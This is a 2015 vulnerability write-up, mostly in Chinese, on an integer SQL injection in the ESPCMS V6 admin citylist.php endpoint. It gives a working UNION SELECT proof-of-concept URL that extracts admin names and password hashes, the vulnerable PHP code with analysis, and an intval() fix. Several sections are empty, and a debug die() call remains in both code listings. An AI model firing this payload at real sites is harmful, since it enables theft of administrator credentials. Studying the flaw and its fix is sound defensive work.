ESPCMS /adminsoft/control/citylist.php Int SQLInjection Vul

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

1. 漏洞描述

Relevant Link:
2. 漏洞触发条件

0x1: POC

http://127.0.0.1/ESPCMSV6/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20UNION%20select%201,2,concat%28name,0x7c,password%29,4,5%20FROM%20espcms_v6.espcms_admin_member
http://127.0.0.1/ESPCMSV6/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(name,0x7c,password),4,5 FROM espcms_v6.espcms_admin_member

3. 漏洞影响范围
4. 漏洞代码分析

/adminsoft/control/citylist.php

class important extends connector {

    function important() {
        $this->softbase(true);
    }
    function oncitylist() {
        //接收外部参数parentid
        $parentid = $this->fun->accept('parentid', 'R'); 

        $parentid = empty($parentid) ? 1 : $parentid;
        $verid = $this->fun->accept('verid', 'R');
        $verid = empty($verid) ? 0 : $verid;
        $db_table = db_prefix . 'city';
        $sql = "select * from $db_table where parentid=$parentid";

        die(var_dump($sql));

        $rs = $this->db->query($sql);
        for ($i = 0; $rsList = $this->db->fetch_array($rs); $i++) {
            if ($verid == $rsList['id']) {
                $list.='<option selected value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
            } else {
                $list.='<option value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
            }
        }
        exit($list);
    }

}

继续跟进$parentid = $this->fun->accept('parentid', 'R');
/public/class_function.php

function accept($k, $var = 'R', $htmlcode = true, $rehtml = false) {
        switch ($var) {
            case 'G':
                $var = &$_GET;
                break;
            case 'P':
                $var = &$_POST;
                break;
            case 'C':
                $var = &$_COOKIE;
                break;
            case 'R':
                $var = &$_GET;
                if (empty($var[$k])) {
                    $var = &$_POST;
                }
                break;
        }
        //对输入进行了addslash转义，但是对Int整型注入没有效果
        $putvalue = isset($var[$k]) ? $this->daddslashes($var[$k], 0) : NULL; 

        return $htmlcode ? ($rehtml ? $this->preg_htmldecode($putvalue) : $this->htmldecode($putvalue)) : $putvalue;
    }

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2015-0163605

5. 防御方法

/adminsoft/control/citylist.php

class important extends connector {

    function important() {
        $this->softbase(true);
    }
    function oncitylist() {
        //接收外部参数parentid
        $parentid = $this->fun->accept('parentid', 'R'); 
        /**/
        $parentid = intval($parentid);
        /**/

        $parentid = empty($parentid) ? 1 : $parentid;
        $verid = $this->fun->accept('verid', 'R');
        $verid = empty($verid) ? 0 : $verid;
        $db_table = db_prefix . 'city';
        $sql = "select * from $db_table where parentid=$parentid";

        die(var_dump($sql));

        $rs = $this->db->query($sql);
        for ($i = 0; $rsList = $this->db->fetch_array($rs); $i++) {
            if ($verid == $rsList['id']) {
                $list.='<option selected value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
            } else {
                $list.='<option value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';
            }
        }
        exit($list);
    }

}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved